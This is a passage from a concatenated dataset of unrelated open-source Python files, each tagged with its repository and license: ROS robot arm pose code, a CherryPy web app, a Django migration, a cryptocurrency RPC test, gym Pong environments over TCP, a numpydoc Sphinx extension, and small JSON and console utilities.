    pose.header.stamp = rospy.Time.now()
    pose.header.frame_id = self.hand_side + '_poking_stick'
    if self.hand_side in ('left', 'right'):
        pose.pose.orientation = Quaternion(0.606, -0.377, -0.498, -0.491)
        if self.hand_side == 'right':
            # TODO change to correct orientation
            Logger.logwarn('Orientation not correctly set for right arm!')
        pose.pose.position.x = 0.048 + 0.1 # this saves the robot (for testing)
        pose.pose.position.y = 0.254 if self.hand_side == 'left' else -0.254
        pose.pose.position.z = 0.103
    return pose
def calc_pre_poke_pose(self, args):
    """Compute the next pre-poke pose on an outward spiral.

    args is [attempt_index, init_pre_poke_pose]; returns a PoseStamped in
    the same frame as the initial pose, offset in y/z along a spiral whose
    radius grows with the attempt index (scaled by self._scaling_factor).
    """
    index = args[0]
    init_pre_poke_pose = args[1]

    goal_pose = PoseStamped()
    goal_pose.header.stamp = rospy.Time.now()
    goal_pose.header.frame_id = init_pre_poke_pose.header.frame_id
    goal_pose.pose.orientation = init_pre_poke_pose.pose.orientation

    # Bugfix: previously referenced an undefined name 'idx' (NameError);
    # the spiral parameter is derived from the attempt index in args.
    spiral_idx = math.sqrt(250 * index)
    y_offset = 0.02 * spiral_idx * math.cos(0.2 * spiral_idx)
    z_offset = 0.02 * spiral_idx * math.sin(0.2 * spiral_idx)

    # Bugfix: Pose has no direct x/y/z attributes; coordinates live in
    # pose.position (previously 'init_pre_poke_pose.pose.x' etc. would
    # raise AttributeError).
    goal_pose.pose.position.x = init_pre_poke_pose.pose.position.x
    goal_pose.pose.position.y = init_pre_poke_pose.pose.position.y + 0.01 * y_offset * self._scaling_factor
    goal_pose.pose.position.z = init_pre_poke_pose.pose.position.z + 0.01 * z_offset * self._scaling_factor

    print(goal_pose)  # debug output; parenthesized for py2/py3 compatibility

    return goal_pose
def calc_poke_pose(self, pre_poke_pose):
    """Derive the poke pose from the pre-poke pose (10 cm along -x).

    Both poses are published on the debug topics for inspection.
    """
    poke_pose = copy.deepcopy(pre_poke_pose)
    poke_pose.pose.position.x -= 0.1
    self._pub1.publish(pre_poke_pose)
    self._pub2.publish(poke_pose)
    return poke_pose
# [/MANUAL_FUNC]
| team-vigir/vigir_behaviors | behaviors/vigir_behavior_trigger_cutting_tool/src/vigir_behavior_trigger_cutting_tool/trigger_cutting_tool_sm.py | Python | bsd-3-clause | 17,004 |
#!/usr/bin/python
# coding=utf-8
# pylint: disable=I0011,C0103,E1101,R0201,R0903
"""
S.H.I.V.A. - Social network History & Information Vault & Analyser
Application entry point
"""
import jinja2
import cherrypy
import platform
from pymongo import MongoClient
from pymongo import ReadPreference
from engine.tools import IgnoreRequestFilter
from engine.tools import secureheaders
# Register the secure-headers tool; it runs late in the response chain so the
# headers it sets are not overwritten by handlers.
cherrypy.tools.secureheaders = cherrypy.Tool(
    "before_finalize", secureheaders, priority=60)

from engine.tools import HazelcastSession
# Expose the Hazelcast-backed session class under the name CherryPy's session
# machinery looks up (tools.sessions.storage_type = "hazelcast").
cherrypy.lib.sessions.HazelcastSession = HazelcastSession

from engine.modules.auth import Auth
# Authentication guard, applied to handlers via @cherrypy.tools.check_login().
cherrypy.tools.check_login = cherrypy.Tool("before_handler", Auth.check_login)

from engine.modules.heartbeat import Heartbeat
from engine.modules.notes import Notes
from engine.modules.vk import VK
class Application(object):
    """ Main application class """

    def __init__(self, template_engine, modules):
        # Mount each module instance as an attribute (its URL path) and
        # collect the named ones for the index page's navigation list.
        self.template_engine = template_engine
        self.module_list = []
        for path, instance in modules.items():
            setattr(self, path, instance)
            if instance.MODULE_NAME is not None:
                self.module_list.append({
                    "path": path,
                    "name": instance.MODULE_NAME,
                    "instance": instance
                })

    @cherrypy.expose
    @cherrypy.tools.check_login()
    def index(self):
        """ Index """
        template = self.template_engine.get_template("index.html")
        return template.render(
            user=cherrypy.session.get("login", None),
            generator=platform.node(),
            modules=self.module_list
        )
def main():
    """ Main (entry point) """
    # Jinja2 environment serving the bundled templates.
    engine = jinja2.Environment(loader=jinja2.FileSystemLoader(
        "/usr/src/app/template"))
    # Replica-set Mongo client with majority read concern and journaled writes.
    client = MongoClient(
        ["mongo1", "mongo2", "mongo3"],
        replicaSet="rs0",
        read_preference=ReadPreference.PRIMARY_PREFERRED,
        readConcernLevel="majority",
        w=2, wtimeout=3000, j=True
    )
    module_map = {
        "heartbeat": Heartbeat(),
        "auth": Auth(engine, client),
        "notes": Notes(engine, client),
        "vk": VK(engine, client)
    }
    conf = "S.H.I.V.A..conf"
    cherrypy.config.update(conf)
    app = cherrypy.tree.mount(
        Application(engine, module_map),
        "/",
        conf
    )
    # Keep heartbeat polling out of the access log.
    app.log.access_log.addFilter(
        IgnoreRequestFilter("GET /heartbeat/index"))
    cherrypy.engine.signals.subscribe()
    cherrypy.engine.start()
    cherrypy.engine.block()


if __name__ == "__main__":
    main()
| LifeDJIK/S.H.I.V.A. | containers/shiva/S.H.I.V.A..py | Python | mit | 2,694 |
# -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-03-10 07:59
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('home', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='users',
name='userMail',
field=models.EmailField(default='email@email.com', max_length=254),
),
]
| itucsProject2/Proje1 | home/migrations/0002_users_usermail.py | Python | unlicense | 465 |
#!/usr/bin/env python
# Copyright (c) 2014 The Diamond Core developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
# Exercise the listreceivedbyaddress API
from test_framework import DiamondTestFramework
from diamondrpc.authproxy import AuthServiceProxy, JSONRPCException
from util import *
def get_sub_array_from_array(object_array, to_match):
    '''
    Finds and returns a sub array from an array of arrays.
    to_match should be a unique identifier of a sub array.

    :param object_array: list of dict-like objects to search
    :param to_match: dict of key/value pairs that all must match
    :returns: the first matching element, or an empty list if none matches
    '''
    for item in object_array:
        # First element whose values match every requested key wins.
        if all(item[key] == value for key, value in to_match.items()):
            return item
    return []
def check_array_result(object_array, to_match, expected, should_not_find=False):
    """
    Pass in array of JSON objects, a dictionary with key/value pairs
    to match against, and another dictionary with expected key/value
    pairs.
    If the should_not_find flag is true, to_match should not be found in object_array

    :raises AssertionError: when a matched object disagrees with `expected`,
        when nothing matches and something should, or when something matches
        and nothing should.
    """
    if should_not_find:
        # Nothing is expected of objects we should not find.
        expected = { }
    num_matched = 0
    for item in object_array:
        # Skip objects that do not match every key/value pair in to_match.
        if not all(item[key] == value for key, value in to_match.items()):
            continue
        for key, value in expected.items():
            if item[key] != value:
                raise AssertionError("%s : expected %s=%s"%(str(item), str(key), str(value)))
        num_matched = num_matched+1
    if num_matched == 0 and not should_not_find:
        raise AssertionError("No objects matched %s"%(str(to_match)))
    if num_matched > 0 and should_not_find:
        raise AssertionError("Objects was matched %s"%(str(to_match)))
class ReceivedByTest(DiamondTestFramework):
    """Regression tests for the wallet 'receivedby' RPC family.

    Exercises listreceivedbyaddress, getreceivedbyaddress,
    listreceivedbyaccount and getreceivedbyaccount against a small test
    network: node 0 funds node 1, and balances/listings are checked at 0
    and at 10 confirmations.
    """
    def run_test(self, nodes):
        '''
        listreceivedbyaddress Test
        '''
        # Send from node 0 to 1
        addr = nodes[1].getnewaddress()
        txid = nodes[0].sendtoaddress(addr, 0.1)
        sync_mempools(nodes)
        #Check not listed in listreceivedbyaddress because has 0 confirmations
        check_array_result(nodes[1].listreceivedbyaddress(),
                           {"address":addr},
                           { },
                           True)
        #Bury Tx under 10 block so it will be returned by listreceivedbyaddress
        nodes[1].setgenerate(True, 10)
        sync_blocks(nodes)
        check_array_result(nodes[1].listreceivedbyaddress(),
                           {"address":addr},
                           {"address":addr, "account":"", "amount":Decimal("0.1"), "confirmations":10, "txids":[txid,]})
        #With min confidence < 10
        check_array_result(nodes[1].listreceivedbyaddress(5),
                           {"address":addr},
                           {"address":addr, "account":"", "amount":Decimal("0.1"), "confirmations":10, "txids":[txid,]})
        #With min confidence > 10, should not find Tx
        check_array_result(nodes[1].listreceivedbyaddress(11),{"address":addr},{ },True)
        #Empty Tx
        addr = nodes[1].getnewaddress()
        check_array_result(nodes[1].listreceivedbyaddress(0,True),
                           {"address":addr},
                           {"address":addr, "account":"", "amount":0, "confirmations":0, "txids":[]})
        '''
        getreceivedbyaddress Test
        '''
        # Send from node 0 to 1
        addr = nodes[1].getnewaddress()
        txid = nodes[0].sendtoaddress(addr, 0.1)
        sync_mempools(nodes)
        #Check balance is 0 because of 0 confirmations
        balance = nodes[1].getreceivedbyaddress(addr)
        if balance != Decimal("0.0"):
            raise AssertionError("Wrong balance returned by getreceivedbyaddress, %0.2f"%(balance))
        #Check balance is 0.1
        balance = nodes[1].getreceivedbyaddress(addr,0)
        if balance != Decimal("0.1"):
            raise AssertionError("Wrong balance returned by getreceivedbyaddress, %0.2f"%(balance))
        #Bury Tx under 10 block so it will be returned by the default getreceivedbyaddress
        nodes[1].setgenerate(True, 10)
        sync_blocks(nodes)
        balance = nodes[1].getreceivedbyaddress(addr)
        if balance != Decimal("0.1"):
            raise AssertionError("Wrong balance returned by getreceivedbyaddress, %0.2f"%(balance))
        '''
        listreceivedbyaccount + getreceivedbyaccount Test
        '''
        #set pre-state
        addrArr = nodes[1].getnewaddress()
        account = nodes[1].getaccount(addrArr)
        received_by_account_json = get_sub_array_from_array(nodes[1].listreceivedbyaccount(),{"account":account})
        if len(received_by_account_json) == 0:
            raise AssertionError("No accounts found in node")
        balance_by_account = rec_by_accountArr = nodes[1].getreceivedbyaccount(account)
        txid = nodes[0].sendtoaddress(addr, 0.1)
        # listreceivedbyaccount should return received_by_account_json because of 0 confirmations
        check_array_result(nodes[1].listreceivedbyaccount(),
                           {"account":account},
                           received_by_account_json)
        # getreceivedbyaddress should return same balance because of 0 confirmations
        balance = nodes[1].getreceivedbyaccount(account)
        if balance != balance_by_account:
            raise AssertionError("Wrong balance returned by getreceivedbyaccount, %0.2f"%(balance))
        nodes[1].setgenerate(True, 10)
        sync_blocks(nodes)
        # listreceivedbyaccount should return updated account balance
        check_array_result(nodes[1].listreceivedbyaccount(),
                           {"account":account},
                           {"account":received_by_account_json["account"], "amount":(received_by_account_json["amount"] + Decimal("0.1"))})
        # getreceivedbyaddress should return updates balance
        balance = nodes[1].getreceivedbyaccount(account)
        if balance != balance_by_account + Decimal("0.1"):
            raise AssertionError("Wrong balance returned by getreceivedbyaccount, %0.2f"%(balance))
        #Create a new account named "mynewaccount" that has a 0 balance
        nodes[1].getaccountaddress("mynewaccount")
        received_by_account_json = get_sub_array_from_array(nodes[1].listreceivedbyaccount(0,True),{"account":"mynewaccount"})
        if len(received_by_account_json) == 0:
            raise AssertionError("No accounts found in node")
        # Test includeempty of listreceivedbyaccount
        if received_by_account_json["amount"] != Decimal("0.0"):
            raise AssertionError("Wrong balance returned by listreceivedbyaccount, %0.2f"%(received_by_account_json["amount"]))
        # Test getreceivedbyaccount for 0 amount accounts
        balance = nodes[1].getreceivedbyaccount("mynewaccount")
        if balance != Decimal("0.0"):
            raise AssertionError("Wrong balance returned by getreceivedbyaccount, %0.2f"%(balance))


if __name__ == '__main__':
    ReceivedByTest().main()
| TGDiamond/Diamond | qa/rpc-tests/receivedby.py | Python | mit | 7,275 |
import abc
import socket
import struct
import logging
import msgpack
import scipy.misc
import gym
from gym import error, spaces, utils
from gym.utils import seeding
from gym.envs.classic_control import rendering
import numpy as np
def _receive_data(sock):
    """Read one length-prefixed msgpack message from *sock*.

    The wire format is a 4-byte native-endian int payload size followed by
    the msgpack-encoded payload.

    :param sock: connected TCP socket
    :returns: the unpacked message, or None when unpacking fails
    """
    data_size_buf = sock.recv(4)
    data_size = struct.unpack('i', data_size_buf)[0]
    data = bytearray(data_size)
    view = memoryview(data)
    to_read = data_size
    # NOTE(review): recv_into returning 0 (peer closed) would loop forever
    # here -- confirm the server never closes mid-message.
    while to_read > 0:
        nbytes = sock.recv_into(view, to_read)
        view = view[nbytes:]  # slicing views is cheap
        to_read -= nbytes
    try:
        return msgpack.unpackb(data)
    except Exception as e:
        # Best effort: log the decode failure; falls through and returns
        # None implicitly, so callers must tolerate a None message.
        logging.info(e)
def _send_data(sock, action):
response = struct.pack('c', action.to_bytes(1, byteorder="big"))
# logging.info("Sending {} bytes".format(len(response)))
sock.sendall(response)
class RemoteEnv(gym.Env, metaclass=abc.ABCMeta):
    """Base gym environment backed by a remote game server over TCP.

    Subclasses override `_decode_game_state` to translate a raw msgpack
    message from the server into an (observation, reward, done) triple.

    BUG FIX: the class previously set the Python-2-only ``__metaclass__``
    attribute, which is a silent no-op on Python 3 (this file already uses
    Python-3-only ``super()`` calls); the metaclass is now declared with
    the Python 3 keyword syntax.
    """

    def __init__(self, host, port):
        """Open a TCP connection to the environment server at (host, port)."""
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.connect((host, port))
        self.last_observation = None

    def _seed(self, seed=None):
        # Seeding is handled remotely (if at all); nothing to do locally.
        pass

    def _decode_game_state(self, message):
        # TODO: Make this method abstract.  Subclasses must override it to
        # return an (observation, reward, done) triple.
        pass

    def _step(self, action):
        """Perform an action and simulate one step in the environment.

        Args:
            action (object): an action provided by the agent.

        Returns:
            observation (object): agent's observation of the current environment.
            reward (float): amount of reward returned after previous action.
            done (boolean): whether the episode has ended, in which case further step()
                calls will return undefined results.
            info (dict): contains auxiliary diagnostic information (helpful for debugging,
                and sometimes learning).
        """
        _send_data(self.sock, action)
        message = _receive_data(self.sock)
        observation, reward, done = self._decode_game_state(message)
        self.last_observation = observation
        return (observation, reward, done, {})

    def _render(self, mode='human', close=False):
        pass

    def _close(self):
        pass

    def _reset(self):
        """Resets the state of the environment and returns an initial observation.

        Returns:
            observation (object): the initial observation of the space.
        """
        message = _receive_data(self.sock)
        observation, reward, done = self._decode_game_state(message)
        self.last_observation = observation
        return observation
class SimplePongEnv(RemoteEnv):
    """Pong environment with a compact 8-element observation vector:
    ball position (2) + ball velocity (2) + cpu paddle (2) + player paddle (2)."""
    metadata = {'render.modes': ['human', 'rgb_array']}

    def __init__(self, host, port):
        # Initialize parent class (opens the TCP connection).
        super().__init__(host, port)
        # The Space object corresponding to valid actions
        self.action_space = spaces.Discrete(3)
        # The Space object corresponding to valid observations
        self.observation_space = spaces.Box(low=-1000, high=1000, shape=(8,))
        # BUG FIX: the reward range was previously assigned to a local
        # variable and silently discarded; gym expects the instance
        # attribute `reward_range`.
        self.reward_range = (-np.inf, np.inf)
        # Current scores of players.
        self.cpu_score = None
        self.player_score = None
        self.viewer = None

    def _step(self, action):
        return super()._step(int(action))

    def _decode_game_state(self, message):
        """Unpack a server message into (observation, reward, done)."""
        step, cpu_score, player_score, ball_pos, ball_vel, cpu_pos, player_pos, height, width, screen = message
        reward = 0
        # Reward is our score delta minus the CPU's since the last frame.
        # NOTE(review): a score of exactly 0 is falsy, so the reward stays 0
        # while either side is still at 0 -- confirm this is intended.
        if self.cpu_score and self.player_score:
            reward = (player_score - self.player_score) - (cpu_score - self.cpu_score)
        self.cpu_score = cpu_score
        self.player_score = player_score
        observation = np.array(ball_pos + ball_vel + cpu_pos + player_pos)
        # An episode ends whenever either side scores (nonzero reward).
        return observation, reward, reward != 0

    def _reset(self):
        """Resets the state of the environment and returns an initial observation.

        Returns:
            observation (object): the initial observation of the space.
        """
        _send_data(self.sock, 0)
        return super()._reset()

    def _render(self, mode='human', close=False):
        if close:
            if self.viewer is not None:
                self.viewer.close()
                self.viewer = None
            return
        if self.viewer is None:
            self.viewer = rendering.SimpleImageViewer()
        if self.last_observation is not None:
            return self.viewer.imshow(self.last_observation)
class PongEnv(RemoteEnv):
    """Pong environment whose observation is the raw RGB screen."""
    metadata = {'render.modes': ['human', 'rgb_array']}

    def __init__(self, host, port):
        # Initialize parent class (opens the TCP connection).
        super().__init__(host, port)
        # The Space object corresponding to valid actions
        self.action_space = spaces.Discrete(3)
        # The Space object corresponding to valid observations
        H = 120
        W = 240
        D = 3
        self.observation_space = spaces.Box(low=0, high=255, shape=(H, W, D))
        # BUG FIX: the reward range was previously assigned to a local
        # variable and silently discarded; gym expects the instance
        # attribute `reward_range`.
        self.reward_range = (-np.inf, np.inf)
        # Current scores of players.
        self.cpu_score = None
        self.player_score = None
        self.viewer = None

    def _step(self, action):
        return super()._step(int(action))

    def _decode_game_state(self, message):
        """Unpack a server message into (screen, reward, done)."""
        step, cpu_score, player_score, height, width, screen = message
        screen = np.frombuffer(screen, dtype=np.uint8)
        # Server sends column-major pixel data; reorder to (height, width, 3).
        screen = screen.reshape((height, width, 3), order='F').swapaxes(0, 1)
        reward = 0
        # NOTE(review): a score of exactly 0 is falsy, so the reward stays 0
        # while either side is still at 0 -- confirm this is intended.
        if self.cpu_score and self.player_score:
            reward = (player_score - self.player_score) - (cpu_score - self.cpu_score)
        self.cpu_score = cpu_score
        self.player_score = player_score
        # An episode ends whenever either side scores (nonzero reward).
        return screen, reward, reward != 0

    def _reset(self):
        """Resets the state of the environment and returns an initial observation.

        Returns:
            observation (object): the initial observation of the space.
        """
        _send_data(self.sock, 0)
        return super()._reset()

    def _render(self, mode='human', close=False):
        if close:
            if self.viewer is not None:
                self.viewer.close()
                self.viewer = None
            return
        if self.viewer is None:
            self.viewer = rendering.SimpleImageViewer()
        if self.last_observation is not None:
            return self.viewer.imshow(self.last_observation)
class FilteredEnv(gym.Env):
    """Wrap a child environment, passing observations and rewards through
    optional filter callables (either may be falsy to disable filtering)."""
    metadata = {'render.modes': ['human', 'rgb_array']}

    def __init__(self, env, ob_filter, rew_filter):
        self.env = env
        # copy over relevant parts of the child env
        self._spec = self.env.spec
        self.metadata = self.env.metadata
        self.action_space = self.env.action_space
        ob_space = self.env.observation_space
        # The observation filter decides the shape of the filtered space.
        shape = ob_filter.output_shape(ob_space)
        self.observation_space = spaces.Box(-np.inf, np.inf, shape)
        self.ob_filter = ob_filter
        self.rew_filter = rew_filter

    def _step(self, ac):
        ob, rew, done, info = self.env._step(ac)
        nob = self.ob_filter(ob) if self.ob_filter else ob
        nrew = self.rew_filter(rew) if self.rew_filter else rew
        # Preserve the unfiltered reward for diagnostics.
        info["reward_raw"] = rew
        return (nob, nrew, done, info)

    def _reset(self):
        ob = self.env.reset()
        return self.ob_filter(ob) if self.ob_filter else ob

    def _render(self, mode='human', close=False):
        self.env._render(mode=mode, close=close)
def rgb2gray(rgb):
    """Collapse an (H, W, 3) RGB image to (H, W) grayscale using the
    BT.601 luma weights 0.2989/0.5870/0.1140."""
    red = rgb[:, :, 0]
    green = rgb[:, :, 1]
    blue = rgb[:, :, 2]
    return 0.2989 * red + 0.5870 * green + 0.1140 * blue
class RGBImageToVector(object):
    """Observation filter: RGB image -> flat grayscale vector.

    NOTE(review): relies on scipy.misc.imresize, which was deprecated in
    SciPy 1.0 and removed in 1.3 -- confirm the pinned SciPy version.
    """
    def __init__(self, out_width=80, out_height=80):
        # Target dimensions of the downsampled image.
        self.out_width = out_width
        self.out_height = out_height
    def __call__(self, obs):
        # obs is an M x N x 3 rgb image, want an (out_width x out_height,)
        # vector
        # nearly 2x faster to downsample then grayscale
        downsample = scipy.misc.imresize(obs, (self.out_width, self.out_height, 3))
        grayscale = rgb2gray(downsample)
        flatten = grayscale.reshape(self.out_width * self.out_height)
        return flatten
    def output_shape(self, x):
        # Filtered observations are 1-D with this many elements; the input
        # space `x` is ignored.
        return self.out_width * self.out_height
| akashin/HSE_AI_Labs | Lab_5/Content/Scripts/remote_env.py | Python | mit | 8,942 |
"""
========
numpydoc
========
Sphinx extension that handles docstrings in the Numpy standard format. [1]
It will:
- Convert Parameters etc. sections to field lists.
- Convert See Also section to a See also entry.
- Renumber references.
- Extract the signature from the docstring, if it can't be determined otherwise.
.. [1] http://projects.scipy.org/numpy/wiki/CodingStyleGuidelines#docstring-standard
"""
import os, re, pydoc
from .docscrape_sphinx import get_doc_object, SphinxDocString
from docutils.parsers.rst import Directive
import inspect
def mangle_docstrings(app, what, name, obj, options, lines,
                      reference_offset=[0]):
    """Sphinx ``autodoc-process-docstring`` hook.

    Rewrites *lines* in place: module docstrings get their decorated top
    title stripped; everything else is re-rendered through the numpydoc
    docstring parser.  Reference labels (``[name]_`` / ``.. [name]``) are
    renumbered so they stay unique across the whole build.

    NOTE: ``reference_offset`` deliberately uses a mutable default -- it is
    a counter that must persist across calls.
    """
    cfg = dict(use_plots=app.config.numpydoc_use_plots,
               show_class_members=app.config.numpydoc_show_class_members)
    if what == 'module':
        # Strip top title
        title_re = re.compile(r'^\s*[#*=]{4,}\n[a-z0-9 -]+\n[#*=]{4,}\s*',
                              re.I|re.S)
        lines[:] = title_re.sub(u'', u"\n".join(lines)).split(u"\n")
    else:
        doc = get_doc_object(obj, what, u"\n".join(lines), config=cfg)
        lines[:] = str(doc).split(u"\n")
    if app.config.numpydoc_edit_link and hasattr(obj, '__name__') and \
           obj.__name__:
        if hasattr(obj, '__module__'):
            v = dict(full_name=u"%s.%s" % (obj.__module__, obj.__name__))
        else:
            v = dict(full_name=obj.__name__)
        lines += [u'', u'.. htmlonly::', '']
        lines += [u' %s' % x for x in
                  (app.config.numpydoc_edit_link % v).split("\n")]
    # replace reference numbers so that there are no duplicates
    references = []
    for line in lines:
        line = line.strip()
        # BUG FIX: the character class needs `+` so multi-character labels
        # such as `[R1]` are detected; previously only single-character
        # reference labels were collected and renumbered.
        m = re.match(r'^.. \[([a-z0-9_.-]+)\]', line, re.I)
        if m:
            references.append(m.group(1))
    # start renaming from the longest string, to avoid overwriting parts
    references.sort(key=lambda x: -len(x))
    if references:
        for i, line in enumerate(lines):
            for r in references:
                if re.match(r'^\d+$', r):
                    new_r = u"R%d" % (reference_offset[0] + int(r))
                else:
                    new_r = u"%s%d" % (r, reference_offset[0])
                lines[i] = lines[i].replace(u'[%s]_' % r,
                                            u'[%s]_' % new_r)
                lines[i] = lines[i].replace(u'.. [%s]' % r,
                                            u'.. [%s]' % new_r)
    reference_offset[0] += len(references)
def mangle_signature(app, what, name, obj, options, sig, retann):
    """Sphinx ``autodoc-process-signature`` hook: when a numpydoc docstring
    declares its own signature, use that instead of the introspected one."""
    # Do not try to inspect classes that don't define `__init__`
    # (or whose `__init__` carries the default object() placeholder doc).
    if inspect.isclass(obj):
        if not hasattr(obj, '__init__'):
            return '', ''
        if 'initializes x; see ' in pydoc.getdoc(obj.__init__):
            return '', ''
    if not (callable(obj) or hasattr(obj, '__argspec_is_invalid_')):
        return
    if not hasattr(obj, '__doc__'):
        return
    doc = SphinxDocString(pydoc.getdoc(obj))
    if doc['Signature']:
        # Drop everything before the opening parenthesis.
        sig = re.sub(u"^[^(]*", u"", doc['Signature'])
    return sig, u''
def setup(app, get_doc_object_=get_doc_object):
    """Sphinx extension entry point: register the numpydoc hooks, config
    values and mangling domains on *app*."""
    global get_doc_object
    get_doc_object = get_doc_object_
    app.connect('autodoc-process-docstring', mangle_docstrings)
    app.connect('autodoc-process-signature', mangle_signature)
    app.add_config_value('numpydoc_edit_link', None, False)
    app.add_config_value('numpydoc_use_plots', None, False)
    app.add_config_value('numpydoc_show_class_members', True, True)
    # Extra mangling domains
    app.add_domain(NumpyPythonDomain)
    app.add_domain(NumpyCDomain)
#------------------------------------------------------------------------------
# Docstring-mangling domains
#------------------------------------------------------------------------------
from docutils.statemachine import ViewList
from sphinx.domains.c import CDomain
from sphinx.domains.python import PythonDomain
class ManglingDomainBase(object):
    """Mixin for Sphinx domains: wraps the directives listed in
    ``directive_mangling_map`` so their content is run through the
    numpydoc mangler before the original directive executes."""
    directive_mangling_map = {}

    def __init__(self, *a, **kw):
        super(ManglingDomainBase, self).__init__(*a, **kw)
        self.wrap_mangling_directives()

    def wrap_mangling_directives(self):
        # Replace each listed directive with its mangling wrapper.
        for directive_name, objtype in self.directive_mangling_map.items():
            wrapped = wrap_mangling_directive(
                self.directives[directive_name], objtype)
            self.directives[directive_name] = wrapped
class NumpyPythonDomain(ManglingDomainBase, PythonDomain):
    """Python domain (``np:``) whose directives mangle numpydoc content."""
    name = 'np'
    # Maps directive name -> object type passed to mangle_docstrings.
    directive_mangling_map = {
        'function': 'function',
        'class': 'class',
        'exception': 'class',
        'method': 'function',
        'classmethod': 'function',
        'staticmethod': 'function',
        'attribute': 'attribute',
    }
class NumpyCDomain(ManglingDomainBase, CDomain):
    """C domain (``np-c:``) whose directives mangle numpydoc content."""
    name = 'np-c'
    # Maps directive name -> object type passed to mangle_docstrings.
    directive_mangling_map = {
        'function': 'function',
        'member': 'attribute',
        'macro': 'function',
        'type': 'class',
        'var': 'object',
    }
def wrap_mangling_directive(base_directive, objtype):
    """Return a subclass of *base_directive* that mangles its content with
    numpydoc (as *objtype*) before delegating to the original directive."""
    class directive(base_directive):
        def run(self):
            env = self.state.document.settings.env
            # Recover the bare object name from the directive argument,
            # e.g. "module.func(sig)" -> "func"; fall back to the raw
            # argument when the regex yields nothing.
            name = None
            if self.arguments:
                m = re.match(r'^(.*\s+)?(.*?)(\(.*)?', self.arguments[0])
                name = m.group(2).strip()
                if not name:
                    name = self.arguments[0]
            lines = list(self.content)
            mangle_docstrings(env.app, objtype, name, None, None, lines)
            self.content = ViewList(lines, self.content.parent)
            return base_directive.run(self)
    return directive
| mpld3/mpld3 | doc/sphinxext/numpy_ext/numpydoc.py | Python | bsd-3-clause | 5,575 |
# Copyright (c) 2020 Dell Inc. or its subsidiaries.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""console.py"""
import logging
from PyU4V.utils import decorators
LOG = logging.getLogger(__name__)
@decorators.deprecation_notice('utils', 9.1, 10.0)
def choose_from_list(query_category, query_list):
    """Prompt the user to pick one item from a list and return it.

    DEPRECATION NOTICE: utils.console.choose_from_list() will be deprecated
    in PyU4V version 10.0. For further information please consult PyU4V 9.1
    release notes.

    :param query_category: query category e.g. snapshot -- str
    :param query_list: query selection options -- list
    :returns: user selection -- str
    """
    print('Choose the {cat} you want from the below list:'.format(
        cat=query_category))
    # Show every option with its numeric index, then read the index back.
    for index, option in enumerate(query_list):
        print('{counter}: {value}'.format(counter=index, value=option))
    selection = input('Choice: ')
    return query_list[int(selection)]
| ciarams87/PyU4V | PyU4V/utils/console.py | Python | mit | 1,468 |
import collections
import json
import datetime
def dict_from(json_string):
    """Parse *json_string* into an OrderedDict (empty on invalid JSON)."""
    util = JSONUtil(json_string)
    return util.to_odict()
class JSONUtil(object):
    """Helper around a raw JSON string: validation and order-preserving
    parsing.

    :param json_input: the raw JSON text to operate on
    """
    def __init__(self, json_input):
        self.json_input = json_input

    def to_odict(self, raise_exception=False):
        """Parse the JSON input into a collections.OrderedDict.

        :param raise_exception: when True, invalid JSON raises ValueError;
            when False (default), invalid JSON yields an empty OrderedDict.
        :returns: OrderedDict with the parsed content
        """
        # A single parse path replaces the previously duplicated
        # json.loads calls in the raising / non-raising branches.
        try:
            return json.loads(self.json_input,
                              object_pairs_hook=collections.OrderedDict)
        except ValueError:
            if raise_exception:
                raise ValueError('Not a valid JSON string')
            return collections.OrderedDict()

    @property
    def valid_json(self):
        """True when the stored input parses as JSON."""
        try:
            json.loads(self.json_input)
        except ValueError:
            return False
        return True

    def to_pretty_string(self):
        """Serialize the raw input with 4-space indentation.

        NOTE(review): this dumps the *string itself* (producing a quoted
        JSON string), not the parsed object -- presumably intentional, but
        worth confirming with callers.
        """
        return json.dumps(self.json_input, indent=4)


JSON = JSONUtil  # Backwards-compatible alias.
class JsonEnhanceEncoder(json.JSONEncoder):
    """JSON encoder that also serializes datetime and date values as
    ISO-like strings."""
    def default(self, obj):
        # datetime must be tested before date (datetime subclasses date)
        # so the time component is not silently dropped.
        if isinstance(obj, datetime.datetime):
            return obj.strftime('%Y-%m-%dT%H:%M:%S')
        if isinstance(obj, datetime.date):
            return obj.strftime('%Y-%m-%d')
        return json.JSONEncoder.default(self, obj)
| eyalev/jsonapp | jsonapp/utils/json_util.py | Python | mit | 1,282 |
from __future__ import division, absolute_import, print_function
import platform
import numpy as np
from numpy import uint16, float16, float32, float64
from numpy.testing import run_module_suite, assert_, assert_equal, dec
def assert_raises_fpe(strmatch, callable, *args, **kwargs):
    """Assert that calling *callable* raises a FloatingPointError whose
    message contains *strmatch*; fail otherwise."""
    try:
        callable(*args, **kwargs)
    except FloatingPointError as exc:
        assert_(strmatch in str(exc),
                "Did not raise floating point %s error" % strmatch)
    else:
        assert_(False,
                "Did not raise floating point %s error" % strmatch)
class TestHalf(object):
def setup(self):
    """Build reference arrays spanning the float16 value space:
    all_* (every bit pattern, incl. NaNs), nonan_* (all non-NaN values
    ascending) and finite_* (nonan minus the two infinities), each in
    float16/float32/float64 flavours."""
    # An array of all possible float16 values
    self.all_f16 = np.arange(0x10000, dtype=uint16)
    # Reinterpret the uint16 bit patterns as float16 without conversion.
    self.all_f16.dtype = float16
    self.all_f32 = np.array(self.all_f16, dtype=float32)
    self.all_f64 = np.array(self.all_f16, dtype=float64)
    # An array of all non-NaN float16 values, in sorted order
    self.nonan_f16 = np.concatenate(
        (np.arange(0xfc00, 0x7fff, -1, dtype=uint16),
         np.arange(0x0000, 0x7c01, 1, dtype=uint16)))
    self.nonan_f16.dtype = float16
    self.nonan_f32 = np.array(self.nonan_f16, dtype=float32)
    self.nonan_f64 = np.array(self.nonan_f16, dtype=float64)
    # An array of all finite float16 values, in sorted order
    self.finite_f16 = self.nonan_f16[1:-1]
    self.finite_f32 = self.nonan_f32[1:-1]
